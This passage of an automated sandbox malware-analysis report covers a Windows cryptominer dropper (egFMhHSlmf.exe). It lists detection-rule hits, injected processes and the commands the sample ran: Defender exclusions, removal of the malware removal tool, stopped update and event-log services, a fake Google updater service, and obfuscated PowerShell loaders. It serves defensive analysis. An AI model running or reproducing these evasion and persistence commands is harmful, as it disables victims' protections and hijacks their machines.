          Source: C:\Windows\System32\conhost.exe | Code function: 68_2_00000146F6B148D8
          Source: C:\Windows\System32\svchost.exe | Code function: 69_3_0000014E41FAD510
          Source: C:\Windows\System32\svchost.exe | Code function: 69_3_0000014E41FB3CD8
          Source: C:\Windows\System32\svchost.exe | Code function: 69_3_0000014E41FA1FF4
          Source: C:\Windows\System32\svchost.exe | Code function: 69_2_0000014E41FDE110
          Source: C:\Windows\System32\svchost.exe | Code function: 69_2_0000014E41FE48D8
          Source: C:\Windows\System32\svchost.exe | Code function: 69_2_0000014E41FD2BF4
          Source: C:\Windows\System32\dwm.exe | Code function: 70_3_000001D15B063CD8
          Source: C:\Windows\System32\dwm.exe | Code function: 70_3_000001D15B05D510
          Source: C:\Windows\System32\dwm.exe | Code function: 70_3_000001D15B051FF4
          Source: C:\Windows\System32\dwm.exe | Code function: 70_2_000001D15B0948D8
          Source: C:\Windows\System32\dwm.exe | Code function: 70_2_000001D15B08E110
          Source: C:\Windows\System32\dwm.exe | Code function: 70_2_000001D15B082BF4
          Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\xptjtnajcbas.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: egFMhHSlmf.exe | Static PE information: invalid certificate
          Source: unknown | Process created: Commandline size = 5379
          Source: unknown | Process created: Commandline size = 5435
          Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.mine.winEXE@97/17@5/5
          Source: C:\Windows\System32\dllhost.exe | Code function: 45_2_0000000140002D54 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx
          Source: C:\Windows\System32\dialer.exe | Code function: 26_2_0000000140001614 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString
          Source: C:\Windows\System32\dialer.exe | Code function: 26_2_0000000140001984 FindResourceExA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5980:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1408:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2760:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6428:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:964:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7052:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2812:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5980:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5372:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2884:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5696:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4188:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5360:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5724:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2436:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3084:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3220:120:WilError_03
          Source: C:\Windows\System32\dialer.exe | Mutant created: \BaseNamedObjects\Global\aymhdakqytvceiwv
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_neubzoxx.u5e.ps1
          Source: egFMhHSlmf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\ProgramData\Google\Chrome\updater.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: egFMhHSlmf.exe | ReversingLabs: Detection: 73%
          Source: egFMhHSlmf.exe | Virustotal: Detection: 75%
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | File read: C:\Users\user\Desktop\egFMhHSlmf.exe
          Source: unknown | Process created: C:\Users\user\Desktop\egFMhHSlmf.exe "C:\Users\user\Desktop\egFMhHSlmf.exe"
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OkULRfyuHQtJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DHHElPDheRwtsc,[Parameter(Position=1)][Type]$RGuqRFFAmI)$xKbDjiiiAOv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'yMo'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'ss'+[Char](44)+'Pu'+'b'+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+'a'+'l'+''+'e'+'d,'+[Char](65)+'ns'+'i'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$xKbDjiiiAOv.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$DHHElPDheRwtsc).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+'Man'+'a'+'g'+[Char](101)+''+[Char](100)+'');$xKbDjiiiAOv.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g'+','+'N'+[Char](
101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RGuqRFFAmI,$DHHElPDheRwtsc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $xKbDjiiiAOv.CreateType();}$HPsmfKkDEZPEO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$AzPrwzsUpDJMw
Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\egFMhHSlmf.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ed3c9ad9-1a05-4753-a177-d35f4db59610}
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tvJmJWkkljdL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rUCvlIraVSkSNU,[Parameter(Position=1)][Type]$lDxjOqsFCa)$hzEPfdAIUJU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Mem'+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'ic'+','+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$hzEPfdAIUJU.DefineConstructor('R'+'T'+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$rUCvlIraVSkSNU).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'aged');$hzEPfdAIUJU.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](72)+'
i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t,V'+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+'',$lDxjOqsFCa,$rUCvlIraVSkSNU).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $hzEPfdAIUJU.CreateType();}$opuJgspdjbNOB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+'a'+'f'+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'et'+[Char](104)+''+[Char](111)+''+[Char](1
          Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{221f05ee-8fb0-4424-9ba0-bc3ff8f1bf74}
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"Jump to behavior
